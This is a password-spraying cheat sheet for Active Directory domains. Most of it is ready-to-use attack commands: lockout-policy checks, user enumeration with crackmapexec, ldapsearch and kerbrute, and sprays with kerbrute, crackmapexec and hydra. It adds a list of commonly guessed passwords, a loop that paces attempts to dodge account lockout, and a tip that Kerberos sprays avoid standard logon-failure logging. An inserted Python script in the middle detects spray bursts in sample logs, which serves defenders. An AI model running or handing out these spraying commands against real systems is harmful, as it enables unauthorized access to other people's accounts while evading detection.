Overview
Try one password against many users. This keeps each account below the lockout threshold (usually 3-5 attempts). Check the lockout policy first.
Check Lockout Policy
crackmapexec smb DC_IP -u user -p password --pass-pol
net accounts /domain
Get-ADDefaultDomainPasswordPolicy
Get User List
# Enum via RPC
crackmapexec smb DC_IP -u user -p password --users
# Enum via LDAP
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "[email protected]" -w 'pass' "(objectClass=user)" sAMAccountName | grep sAMAccountName
# Kerbrute user enum (no creds needed)
kerbrute userenum -d domain.local --dc DC_IP users.txt
Kerbrute
kerbrute passwordspray -d domain.local --dc DC_IP users.txt 'Password123!'
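Uses Kerberos pre-auth, so failures are not logged as standard logon failures (event 4625). With Kerberos auditing enabled they appear as event 4771 (Kerberos pre-authentication failed), and failed attempts still count toward the lockout threshold.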
CrackMapExec
SMB
crackmapexec smb DC_IP -u users.txt -p 'Password123!' --continue-on-success
LDAP
crackmapexec ldap DC_IP -u users.txt -p 'Password123!'
Multiple Passwords (Careful — Lockout)
crackmapexec smb DC_IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
--no-bruteforce = try user1:pass1, user2:pass2 (not all combos).
Spray with Hydra
hydra -L users.txt -p 'Password123!' smb://DC_IP
hydra -L users.txt -p 'Password123!' ldap3://DC_IP
Common Passwords to Try
Password1
Password123
Password123!
Welcome1
Welcome123
Company2024
Season+Year (Summer2024, Winter2024)
MonthYear (January2024)
Spray Script (Rate Limited)
for pass in 'Spring2024!' 'Password123!' 'Welcome1'; do
echo "[*] Trying: $pass"
crackmapexec smb DC_IP -u users.txt -p "$pass" --continue-on-success
echo "[*] Sleeping 30 minutes..."
sleep 1800
done
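Seen from the defender's side, each round of the spray described above is a burst of authentication failures from one source against many distinct accounts, repeated after a long pause. The following is an added example, not part of the original page: it flags such bursts in a constructed log sample. The line format, the names `SAMPLE`, `parse` and `detect_sprays`, and the thresholds are assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real logs. Assumed line format:
#   <ISO timestamp> <Windows event ID> <source IP> <account>
# 4771 = Kerberos pre-authentication failed, 4625 = failed logon, 4624 = success.
USERS = ["alice", "bob", "carol", "dave", "erin", "frank"]
SAMPLE = "\n".join(
    [f"2024-03-01T09:00:0{i} 4771 10.0.0.50 {u}" for i, u in enumerate(USERS)]
    + [f"2024-03-01T09:30:0{i} 4771 10.0.0.50 {u}" for i, u in enumerate(USERS)]
    + [f"2024-03-01T10:00:0{i} 4625 10.0.0.77 bob" for i in range(6)]  # one user: not a spray
    + ["2024-03-01T10:05:00 4624 10.0.0.77 bob"]
)
FAILURE_IDS = {"4625", "4771"}


def parse(text):
    """Yield (time, source, account) for authentication-failure lines only."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[1] in FAILURE_IDS:
            yield datetime.fromisoformat(parts[0]), parts[2], parts[3].lower()


def detect_sprays(text, min_users=5, window=timedelta(minutes=5)):
    """Return (source, burst_start, accounts) for each burst in which one source
    fails authentication against at least min_users distinct accounts."""
    by_source = defaultdict(list)
    for ts, src, user in parse(text):
        by_source[src].append((ts, user))
    alerts = []
    for src, events in by_source.items():
        events.sort()
        i = 0
        while i < len(events):
            start, users, j = events[i][0], set(), i
            while j < len(events) and events[j][0] - start <= window:
                users.add(events[j][1])
                j += 1
            if len(users) >= min_users:
                alerts.append((src, start.isoformat(), sorted(users)))
                i = j  # skip the burst so each spray round alerts once
            else:
                i += 1
    return sorted(alerts)


if __name__ == "__main__":
    for src, start, users in detect_sprays(SAMPLE):
        print(f"spray suspected from {src} at {start}: {len(users)} accounts")
```

Counting distinct accounts per source, rather than total failures, is what separates a spray from one user mistyping a password; the 30-minute pause between rounds does not hide the burst inside each round.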
Quick Reference
| Task | Command |
|---|---|
| Check policy | crackmapexec smb DC -u user -p pass --pass-pol |
| Kerbrute | kerbrute passwordspray -d DOM --dc DC users.txt 'Pass' |
| CME spray | crackmapexec smb DC -u users.txt -p 'Pass' --continue-on-success |
| User enum | kerbrute userenum -d DOM --dc DC users.txt |